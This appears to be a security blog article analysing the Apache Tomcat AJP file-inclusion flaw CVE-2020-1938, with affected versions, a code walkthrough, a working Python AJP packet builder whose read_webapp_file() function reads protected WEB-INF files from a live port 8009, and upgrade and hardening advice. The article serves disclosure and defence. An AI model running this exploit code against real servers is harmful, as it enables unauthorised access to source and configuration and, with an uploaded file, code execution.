
Exploiting Apache Tomcat AJP File Inclusion (CVE‑2020‑1938) for Remote Code Execution

This article analyzes the high‑severity Apache Tomcat AJP file‑inclusion vulnerability (CVE‑2020‑1938), detailing affected versions, the underlying code flaw, how attackers can read arbitrary files and achieve remote code execution, and provides concrete upgrade recommendations to mitigate the risk.

macrozheng

1. Vulnerability Background

On February 20, 2020, 360CERT reported that CNVD‑2020‑10487 / CVE‑2020‑1938 is a high‑severity file‑inclusion vulnerability in the AJP connector of Apache Tomcat. An unauthenticated attacker who can reach the AJP port can read any file beneath a web application's root directory, including configuration files and source code under WEB-INF that the HTTP connector never serves, and, if the attacker can also plant a file containing JSP code inside the application, can have that file compiled and executed. Affected versions are Tomcat 6 (all releases), Tomcat 7 < 7.0.100, Tomcat 8 < 8.5.51, and Tomcat 9 < 9.0.31.

2. Affected Versions

Apache Tomcat 9.x < 9.0.31

Apache Tomcat 8.x < 8.5.51

Apache Tomcat 7.x < 7.0.100

Apache Tomcat 6.x

3. Vulnerability Analysis

3.1 AJP Connector

The Tomcat server receives requests through Connector components. The standard HTTP connector listens on port 8080; the AJP connector listens on port 8009 and speaks AJP/1.3, a binary protocol intended for the link between a front‑end web server (Apache httpd with mod_jk or mod_proxy_ajp, for example) and Tomcat in reverse‑proxy or clustered deployments.

<code>&lt;Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" /&gt;</code>
<code>&lt;Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /&gt;</code>

In the affected releases the shipped server.xml enables the AJP connector and sets no address attribute, so it binds to every interface; unless a firewall or the deployment blocks port 8009, the connector is reachable from the network. AJP has no authentication of its own, and the optional shared secret (the requiredSecret attribute in those releases) was not configured by default, so any client that can open a TCP connection to 8009 can submit forward requests.

3.2 Code Analysis

The flaw originates in org.apache.coyote.ajp.AbstractAjpProcessor.prepareRequest() (AjpProcessor in Tomcat 8.5 and 9), where the attributes carried in an AJP forward request are decoded. A few attribute names used for proxy bookkeeping (local address, remote port, SSL protocol, load‑balancer activation) are handled specially; every other name/value pair falls through to request.setAttribute(name, value) with no filtering. An AJP client can therefore set arbitrary request attributes, including the three that the container normally populates only during a RequestDispatcher.include() call:

    javax.servlet.include.request_uri
    javax.servlet.include.path_info
    javax.servlet.include.servlet_path

3.3 Arbitrary File Read

When the request is routed to org.apache.catalina.servlets.DefaultServlet (any URI that no other servlet mapping claims), serveResource() calls getRelativePath(). That method checks whether javax.servlet.include.request_uri is set; if it is, the request is treated as an include and the resource path is built from the javax.servlet.include.servlet_path and javax.servlet.include.path_info attributes (concatenated in that order) instead of from the real request URI. The resulting path is passed to getResource(), which resolves it against the web application's resource root, so the attacker can read any file beneath that root, including ones the HTTP connector refuses to serve, e.g. /WEB-INF/web.xml, compiled classes under /WEB-INF/classes and application source. Files outside the web application (other contexts, /etc/passwd) are not reachable this way: the resource root normalizes the path and rejects anything that escapes it.

3.4 Remote Code Execution

If the attacker can also get a file containing JSP code onto the server inside a web application directory (for example through an upload feature that stores files under the application root, whatever extension they carry), the same trick becomes code execution. A request whose URI ends in .jsp is mapped to org.apache.jasper.servlet.JspServlet, and its service() method reads javax.servlet.include.servlet_path and javax.servlet.include.path_info to decide which file to compile. Pointing those attributes at the uploaded file makes Jasper compile and run it as a JSP regardless of its name, and the attacker's code executes with the privileges of the Tomcat process.
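To make sections 3.2 to 3.4 concrete, the following AJP/1.3 packet builder and response parser is added here as a worked example; it is not code from the original article or from the Tomcat project. It encodes a FORWARD_REQUEST carrying the three include attributes, decodes the container's reply, and can be run offline against a constructed sample reply. The host name tomcat.example, the unmapped URI /nonexistent and the sample reply bytes are assumptions made for illustration; read_webapp_file() is the only function that touches a network and is not called in the offline run.

```python
import socket
import struct

# AJP/1.3 constants taken from the protocol's packet layout
AJP_MAGIC_REQ = b"\x12\x34"   # client -> container packet magic
AJP_MAGIC_RESP = b"AB"        # container -> client packet magic
FORWARD_REQUEST = 2           # prefix code of a forwarded HTTP request
METHOD_GET = 2
HDR_HOST = 0xA00B             # coded header name for "Host"
ATTR_REQ_ATTRIBUTE = 0x0A     # SC_A_REQ_ATTRIBUTE: free-form name/value pair
ATTR_ARE_DONE = 0xFF          # terminates the attribute list
SEND_BODY_CHUNK = 3
SEND_HEADERS = 4
END_RESPONSE = 5


def ajp_string(s):
    """Encode an AJP string: 2-byte big-endian length, the bytes, a NUL (not counted)."""
    raw = s.encode()
    return struct.pack(">H", len(raw)) + raw + b"\x00"


def include_attributes(path):
    """The three attributes prepareRequest() passes through unfiltered. DefaultServlet
    builds the resource path as servlet_path + path_info, so "/" + "WEB-INF/web.xml"
    becomes the context-rooted path /WEB-INF/web.xml."""
    return [
        ("javax.servlet.include.request_uri", "/"),   # only has to be non-null
        ("javax.servlet.include.servlet_path", "/"),
        ("javax.servlet.include.path_info", path),
    ]


def build_forward_request(uri, server_name, attributes):
    """Build one FORWARD_REQUEST packet for GET <uri> carrying <attributes>.
    The URI must map to DefaultServlet (no other servlet claims it); for the RCE
    variant it would instead end in .jsp and path_info would name the planted file."""
    body = bytes([FORWARD_REQUEST, METHOD_GET])
    body += ajp_string("HTTP/1.1")
    body += ajp_string(uri)
    body += ajp_string("127.0.0.1")        # remote_addr as the application will see it
    body += ajp_string("localhost")        # remote_host
    body += ajp_string(server_name)        # server_name
    body += struct.pack(">H", 8009)        # server_port
    body += b"\x00"                        # is_ssl = false
    body += struct.pack(">H", 1)           # num_headers
    body += struct.pack(">H", HDR_HOST) + ajp_string(server_name)
    for name, value in attributes:
        body += bytes([ATTR_REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    body += bytes([ATTR_ARE_DONE])
    return AJP_MAGIC_REQ + struct.pack(">H", len(body)) + body


def parse_ajp_response(data):
    """Walk container -> client packets and return (HTTP status, reassembled body)."""
    status, body, pos = None, bytearray(), 0
    while pos + 4 <= len(data):
        if data[pos:pos + 2] != AJP_MAGIC_RESP:
            raise ValueError("bad AJP response magic at offset %d" % pos)
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        payload = data[pos + 4:pos + 4 + length]
        pos += 4 + length
        if not payload:
            break
        prefix = payload[0]
        if prefix == SEND_HEADERS:            # status, status text, header count, headers
            (status,) = struct.unpack(">H", payload[1:3])
        elif prefix == SEND_BODY_CHUNK:       # chunk length, chunk bytes, NUL
            (chunk_len,) = struct.unpack(">H", payload[1:3])
            body += payload[3:3 + chunk_len]
        elif prefix == END_RESPONSE:
            break
    return status, bytes(body)


def sample_response(chunk=b"<web-app/>"):
    """Constructed container reply for the offline run (not captured from a real
    server): SEND_HEADERS 200 with no headers, one body chunk, END_RESPONSE."""
    hdrs = bytes([SEND_HEADERS]) + struct.pack(">H", 200) + ajp_string("OK") + struct.pack(">H", 0)
    body = bytes([SEND_BODY_CHUNK]) + struct.pack(">H", len(chunk)) + chunk + b"\x00"
    end = bytes([END_RESPONSE, 1])
    return b"".join(AJP_MAGIC_RESP + struct.pack(">H", len(p)) + p for p in (hdrs, body, end))


def read_webapp_file(host, path, port=8009, timeout=5):
    """Send the crafted request to a live AJP port (only on systems you are
    authorised to test) and return (status, body). Stops when the END_RESPONSE
    packet (AB 0002 05) has been seen; good enough for a demonstration."""
    packet = build_forward_request("/nonexistent", host, include_attributes(path))
    raw = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(packet)
        while b"AB\x00\x02\x05" not in raw:
            chunk = sock.recv(4096)
            if not chunk:
                break
            raw += chunk
    return parse_ajp_response(raw)


if __name__ == "__main__":
    pkt = build_forward_request("/nonexistent", "tomcat.example", include_attributes("WEB-INF/web.xml"))
    print(pkt.hex())
    print(parse_ajp_response(sample_response()))
```

Nothing in the packet is malformed: it is a valid AJP forward request that a proxy could legitimately send, which is why neither the connector nor the servlet has anything to reject. The fix in the patched releases is not a parser change but a requirement that the client prove it is the trusted proxy (the shared secret) before such attributes are honoured.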

4. Mitigation

Tomcat 6 is no longer maintained and has no fixed release; deployments still on it should move to a supported branch. For the other branches, upgrade to at least the version below (or any later release in the same branch):

Tomcat 7 → 7.0.100

Tomcat 8 → 8.5.51

Tomcat 9 → 9.0.31

The fixed releases also change the AJP defaults: the connector is commented out in the shipped server.xml, binds to the loopback address when enabled, and requires a shared secret (secretRequired defaults to true, and a connector with no secret configured refuses to start). Two operational points follow. If nothing in front of Tomcat speaks AJP, delete or comment out the connector rather than relying on the defaults; if a reverse proxy such as Apache httpd with mod_jk does, bind the connector to an internal address, configure the same secret on both sides, and keep port 8009 closed at the network edge. An existing server.xml that enables the connector without a secret will stop the connector from starting after the upgrade; fix that by adding a secret, not by setting secretRequired="false".

Download links:

7.0.100: https://tomcat.apache.org/download-70.cgi

8.5.51: https://tomcat.apache.org/download-80.cgi

9.0.31: https://tomcat.apache.org/download-90.cgi
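For reference, the weak connector definition beside a hardened one, added here as an example and not taken from the original article; the attribute names are those documented for the fixed releases, and the secret value is a placeholder to be replaced with a long random string.

```xml
<!-- Weak: the default shipped before 9.0.31 / 8.5.51 / 7.0.100. No address
     attribute, so the connector listens on every interface, and no secret,
     so any client that can reach TCP/8009 can send forward requests. -->
<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />

<!-- Hardened: loopback only, shared secret required and set. Give the proxy
     the same value (for mod_jk: worker.<name>.secret in workers.properties).
     Omit the connector entirely if no reverse proxy speaks AJP to this Tomcat. -->
<Connector port="8009" protocol="AJP/1.3" redirectPort="8443"
           address="127.0.0.1"
           secretRequired="true"
           secret="REPLACE-WITH-A-LONG-RANDOM-VALUE" />
```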

Written by

macrozheng

Dedicated to Java tech sharing and dissecting top open-source projects. Topics include Spring Boot, Spring Cloud, Docker, Kubernetes and more. Author’s GitHub project “mall” has 50K+ stars.
